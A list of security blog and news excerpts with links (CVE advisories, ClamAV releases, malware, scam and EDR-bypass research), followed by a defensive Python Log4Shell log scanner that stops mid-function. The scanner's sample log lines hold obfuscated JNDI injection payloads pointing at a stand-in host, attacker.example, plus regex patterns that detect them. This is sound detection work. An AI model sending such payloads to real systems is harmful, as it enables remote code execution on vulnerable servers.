This could have enabled a stealthy data exfiltration method in cases where an attacker had previously compromised a VPC, by smuggling data through the user agent field in denied requests.
https://www.cloudvulndb.org/vpc-endpoint-log-data-exfil
Protecting Your Website From DDoS Attack
Distributed denial-of-service attacks pose an increasing threat to organizations, with even some of the largest firms suffering significant disruptions from such attacks. Attackers use botnets of compromised IoT devices to...
The post Protecting Your Website From DDoS Attack appeared first on Hacker Combat.
https://www.hackercombat.com/ddos-attack/
Subdomain Takeover Vulnerability in GitLab Pages
A vulnerability in GitLab Pages allowed attackers to take over dangling custom domains pointing to 'instanceX.gitlab.io'. The issue occurred when adding an unverified custom domain to GitLab Pages, which serves content for 7 days before disabling it. This could lead to cookie stealing, phishing campaigns, and bypassing of Content Security Policies and CORS.
https://www.cloudvulndb.org/subdomain-takeover-vulnerability-gitlab-pages
Effective Fuzzing: A Dav1d Case Study
Guest post by Nick Galloway, Senior Security Engineer, 20% time on Project Zero
Late in 2023, while working on a 20% project with Project Zero, I found an integer overflow in the dav1d AV1 video decoder. That integer overflow leads to an out-of-bounds write to memory. Dav1d 1.4.0 patched this, and it was assigned CVE-2024-1580. After the disclosure, I received some questions about how this issue was discovered, since dav1d is already being fuzzed by at least oss-fuzz. This blog post explains what happened. It’s a useful case study in how to construct fuzzers to exercise as much code as possible. But first, some background...
Background
Dav1d
Dav1d is a highly-optimized AV1 decoder. AV1 is a royalty-free video coding format developed by the Alliance...
https://googleprojectzero.blogspot.com/2024/10/effective-fuzzing-dav1d-case-study.html
Issue with NVIDIA Container Toolkit (CVE-2024-0132, CVE-2024-0133)
Publication Date: 2024/10/01 6:35 PM PDT
AWS is aware of CVE-2024-0132 and CVE-2024-0133, issues affecting the NVIDIA container toolkit 1.16. At this time, the following services require customer action. If we become aware of additional impact, we will update this bulletin.
Amazon Elastic Container Service (Amazon ECS)
Amazon ECS has released updated ECS GPU-optimized Amazon Machine Images (AMIs) with the patched NVIDIA container toolkit v1.16.2. We recommend that ECS customers update to these AMIs (or the latest available). Additional information on the ECS-optimized AMI is available in our "Amazon ECS-optimized Linux AMIs" developer guide.
Amazon Elastic Kubernetes Service (Amazon EKS)
Amazon EKS has released updated EKS GPU-optimized Amazon Machine Images...
https://aws.amazon.com/security/security-bulletins/AWS-2024-010/
Lies, damned lies, and Impact Hero (refoorest, allcolibri)
Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven't been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment.
Colibri Hero (also known as allcolibri) is a company with a noble mission:
We want to create a world where organizations can make a positive impact on people and communities.
One of the company's products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website:
Plantation financed by our partners
So the users merely need to have the...
https://palant.info/2024/10/01/lies-damned-lies-and-impact-hero-refoorest-allcolibri/
CloudImposer
Google Cloud Composer is a managed service for Apache Airflow. Tenable discovered that the Cloud Composer package was vulnerable to dependency confusion, which could have allowed attackers to inject malicious code when the package was compiled from source. This could have led to remote code execution on machines running Cloud Composer, which include various other GCP services as well as internal servers at Google. The dependency confusion stemmed from Google's risky recommendation in their documentation to use the --extra-index-url argument when installing private Python packages. Following disclosure, Google fixed the dependency confusion vulnerability and also updated their documentation.
https://www.cloudvulndb.org/cloudimposer-gcp
ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with exception to 0.103.12) through Docker Hub.
The images on Docker Hub may not be immediately available on release day.
Continue reading to learn what changed in each version.
1.4.1
ClamAV 1.4.1 is a critical patch release with the following fixes:
CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.
This issue affects all currently supported versions. It will be fixed in:
1.4.1
1.3.2
1.0.7
0.103.12
Thank...
http://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html
CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
ClamAV 1.4.0 feature release and ClamAV bytecode compiler 1.4.0 release
The ClamAV 1.4.0 feature release is now stable. We encourage everyone to download the latest version now from the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*: Alpine-based images, Debian-based multi-arch images. *The Docker images are built on release day and will be made available when they are ready. We are also publishing ClamAV bytecode compiler version 1.4.0. The ClamAV bytecode compiler release files are available for download on the GitHub Release page and through Docker Hub.
ClamAV platform support changes
We will no longer provide Linux 32-bit packages. With RHEL 7 reaching end-of-life, we had to upgrade our build hosts and selected Alma Linux 8. Alma Linux does not provide 32-bit images. ClamAV users on 32-bit platforms can still build from source. We now provide...
http://blog.clamav.net/2024/08/clamav-140-feature-release-and-clamav.html
CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars.
The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations/?utm_source=rss&utm_medium=rss&utm_campaign=cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations
RADIUS Protocol CVE-2024-3596
A fundamental design flaw within the RADIUS protocol has been proven to be exploitable, compromising the integrity in the RADIUS Access-Request process. The attack allows a malicious user to modify packets in a way that would be indistinguishable to a RADIUS client or server. To be successful, the attacker must have the ability to inject themselves between the client and server. Revised on 2025-04-23 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-255
ClamAV 0.103 LTS End of Life Announcement
The ClamAV 0.103 LTS release is nearing end-of-life (EOL) with regards to security vulnerability fix support from our team. This end of life date will be Sept. 14, 2024.
ClamAV 0.103 users will be able to update signatures from the official database mirror for an additional one year after the EOL date. After Sept. 14, 2025, we may block ClamAV 0.103 from downloading signature updates.
We recommend that users update to the newest LTS release, ClamAV 1.0.6. For users that want to upgrade to the newest non-LTS release, use ClamAV 1.3.1. The most recent version of ClamAV can be found here: https://www.clamav.net/downloads
The following is a list of major changes available to users in the newest versions of ClamAV.
Since ClamAV 0.103, ClamAV 1.0 LTS adds:
· A...
http://blog.clamav.net/2024/08/clamav-0103-lts-end-of-life-announcement.html
60 Hurts per Second – How We Got Access to Enough Solar Power to Run the United States
The electricity grid – the buzzing, crackling marvel that supplies the lifeblood of modernity - is by far the largest structure humanity ever built. It's so big, in fact, that few people even notice it, like a fish can't see the ocean.
Until the grid goes down, that is. Then, like the fish dangling from the angler's hook, we see our vulnerability. Modernity dissolves into a sudden silence, followed by the repeated flick of a light switch, and a howl of panic at the prospect of missed appointmen
https://www.bitdefender.com/en-us/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states
How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary.
But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/
Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers.
Sponsored supplement scams on social media platforms
https://www.bitdefender.com/en-us/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media
Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […]
The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors
The Windows Registry Adventure #3: Learning resources
Posted by Mateusz Jurczyk, Google Project Zero
When tackling a new vulnerability research target, especially a closed-source one, I prioritize gathering as much information about it as possible. This gets especially interesting when it's a subsystem as old and fundamental as the Windows registry. In that case, tidbits of valuable data can lurk in forgotten documentation, out-of-print books, and dusty open-source code – each potentially offering a critical piece of the puzzle. Uncovering them takes some effort, but the payoff is often immense. Scraps of information can contain hints as to how certain parts of the software are implemented, as well as why – what were
...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html
New Diamorphine rootkit variant seen undetected in the wild
Introduction Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild. Diamorphine is a well-known […]
The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild
Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests.
As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs.
We notice
https://www.bitdefender.com/en-us/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea
Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors.
In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/en-us/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact
Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign
The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report
ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html
GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers.
The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining
From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […]
The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams
ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.
1.3.1
ClamAV 1.3.1 is a critical patch release with the following fixes:
CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition. This issue affects version 1.3.0 only and does not affect prior versions. Thank you to Błażej Pawłowski for identifying this issue. GitHub pull request
Updated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html
Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system.
We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-lg-webos
AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators.
Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/en-us/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns
Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing.
I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept users' network connections (Man-in-the-Middle attack).
It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/
Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams.
In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling to AI-generated celebrity-endorsed giveaways.
Our latest analysis has spotted a consistent trend, with fraudsters continuing to exploit Meta's ad system to deceive consumers.
The hustle? A long-established ruse that involves peddling so-called mystery boxes from
https://www.bitdefender.com/en-us/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media
Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro.
The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day
When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file).
A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/en-us/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild
Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable! Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support. The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub*: Alpine-based images, Debian-based multi-arch images. *The Docker images are built on release day and may not be available until later in the day. Continue reading to learn what changed in each version.
1.3.0
ClamAV 1.3.0 includes the following improvements and changes:
Major changes
Added support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html
ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate. You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags: clamav/clamav:unstable, clamav/clamav:unstable_base, clamav/clamav-debian:unstable, clamav/clamav-debian:unstable_base. This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html
ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`. In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`. ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html
An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first.
As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon.
Update (2025-01-12): Added Lemmy endpoint which has been fixed by now. Also mentioned...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/
It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html
We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig
Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023
Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses
Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms
Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices
Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption
NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework
Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw
CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact
A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html
‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector
HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy
Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers
TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html
Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)
https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html
CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...]
The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/
Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/
iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient input validation flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)
https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html
Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/
Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
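The two Log4Shell entries above describe the attack side: a forged ${jndi:...} lookup that makes a vulnerable Log4j fetch a class from an attacker-controlled LDAP server. The following added example (not code from either tutorial, nor from the Log4j project) shows the defensive side a responder wants: it normalises the obfuscated forms of that lookup that show up in web-server logs (URL-encoding, ${lower:...}, the ${::-x} fallback syntax), flags the lines that carry one with the scheme and callback host, and adds a first-pass triage check against the version range the article states (2.0-beta9 through 2.14.1). The log lines, the host attacker.example and all function names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page). The User-Agent and the
# query string are the usual injection points for the ${jndi:...} lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://attacker.example/a} HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fx%7D"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/x}"',
]

# Log4j lookup obfuscations commonly seen in the wild:
#   ${lower:J} / ${upper:j}      -> j / J
#   ${::-j} / ${env:NOPE:-j}     -> j   (the ":-default" fallback syntax)
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation, match the lookup itself and pull out scheme and callback host.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s:]+)", re.IGNORECASE)


def _unwrap_case(m: re.Match) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalise(payload: str, max_rounds: int = 10) -> str:
    """URL-decode and unwrap nested lookups until the text stops changing."""
    text = payload
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)
        text = CASE_LOOKUP.sub(_unwrap_case, text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == previous:
            break
    return text


def scan_log_lines(lines):
    """One finding per line that still carries a JNDI lookup after normalisation."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_RE.search(normalise(line))
        if match:
            findings.append({"line": number, "scheme": match.group(1).lower(), "host": match.group(2)})
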